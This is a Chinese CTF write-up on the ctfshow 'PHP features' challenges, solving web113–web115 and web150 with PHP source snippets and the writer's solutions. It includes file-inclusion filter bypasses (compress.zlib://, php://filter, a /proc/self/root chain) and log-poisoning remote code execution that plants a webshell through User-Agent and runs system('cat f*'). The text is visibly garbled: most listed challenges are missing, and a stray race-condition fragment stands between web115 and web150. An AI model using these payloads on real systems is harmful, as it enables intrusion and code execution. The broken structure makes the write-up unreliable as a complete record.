ctfshow php特性 下

目录

web113

web114

web115

web123(php解析特性)

web125 

web126

web127(php解析特性)

web128

web129

web130

web131

 web132

web133

web134

web135

 web136(tee命令写入命令执行)

web137

web138

 web139

web140

web141

web142

web143

web144

web155

web146

web147

web148

web149

 web150

web150_plust

web113

function filter($file){
    if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){
        die('hacker!');
    }else{
        return $file;
    }
}
$file=$_GET['file'];
if(! is_file($file)){
    highlight_file(filter($file));

?file=compress.zlib://flag.php

还有一种绕过是：

/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/p
roc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/pro
c/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/
self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/se
lf/root/proc/self/root/var/www/html/flag.php

解释可以看一下这个：[CTF]proc目录的应用_Snakin_ya的博客-CSDN博客

web114

if(preg_match('/compress|root|zip|convert|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){
        die('hacker!'); 

compress和root和convert，之前的骚操作被过滤了。不过filter这次没过滤。

直接?file=php://filter/resource=flag.php

web115

function filter($num){
    $num=str_replace("0x","1",$num);
    $num=str_replace("0","1",$num);
    $num=str_replace(".","1",$num);
    $num=str_replace("e","1",$num);
    $num=str_replace("+","1",$num);
    return $num;
}
$num=$_GET['num'];
if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36'){
    if($num=='36'){
        echo $flag;
    }else{
        echo "hacker!!";
    } 

测试

php 
 
 
预期解 条件竞争：
 
 
ctf=1.php show=
 
 
使用bp intruder模块不断访问并传参，并开一个去不断访问 1.php
 
 
根目录下发现flag文件ctfshow_fl0g_here.txt
 
post：shell=system('cat /ctfshow_fl0g_here.txt');得到flag。
 
 
 web150 
include("flag.php");
error_reporting(0);
highlight_file(__FILE__);

class CTFSHOW{
    private $username;
    private $password;
    private $vip;
    private $secret;

    function __construct(){
        $this->vip = 0;
        $this->secret = $flag;
    }

    function __destruct(){
        echo $this->secret;
    }

    public function isVIP(){
        return $this->vip?TRUE:FALSE;
        }
    }

    function __autoload($class){
        if(isset($class)){
            $class();
    }
}

#过滤字符
$key = $_SERVER['QUERY_STRING'];
if(preg_match('/\_| |\[|\]|\?/', $key)){
    die("error");
}
$ctf = $_POST['ctf'];
extract($_GET);
if(class_exists($__CTFSHOW__)){
    echo "class is exists!";
}

if($isVIP && strrpos($ctf, ":")===FALSE){
    include($ctf);
} 
 
 
 
非预期解：
 
 
文件包含日志注入rce。
 
 
burp抓包，User-Agent ：写入木马
 
 
get：?isVIP=1
 
 
post：ctf=/var/log/nginx/access.log&shell=system('cat f*');
 
 
web150_plust 
这道题修复了日志注入的非预期解：
 
没干出来。知识点储备不够，以后会回过头来看一下。
 
至此php特性这一篇也算是刷完了。学会了好多没见过的绕过姿势。记录下来掌握住，然后继续开启学习新的篇章。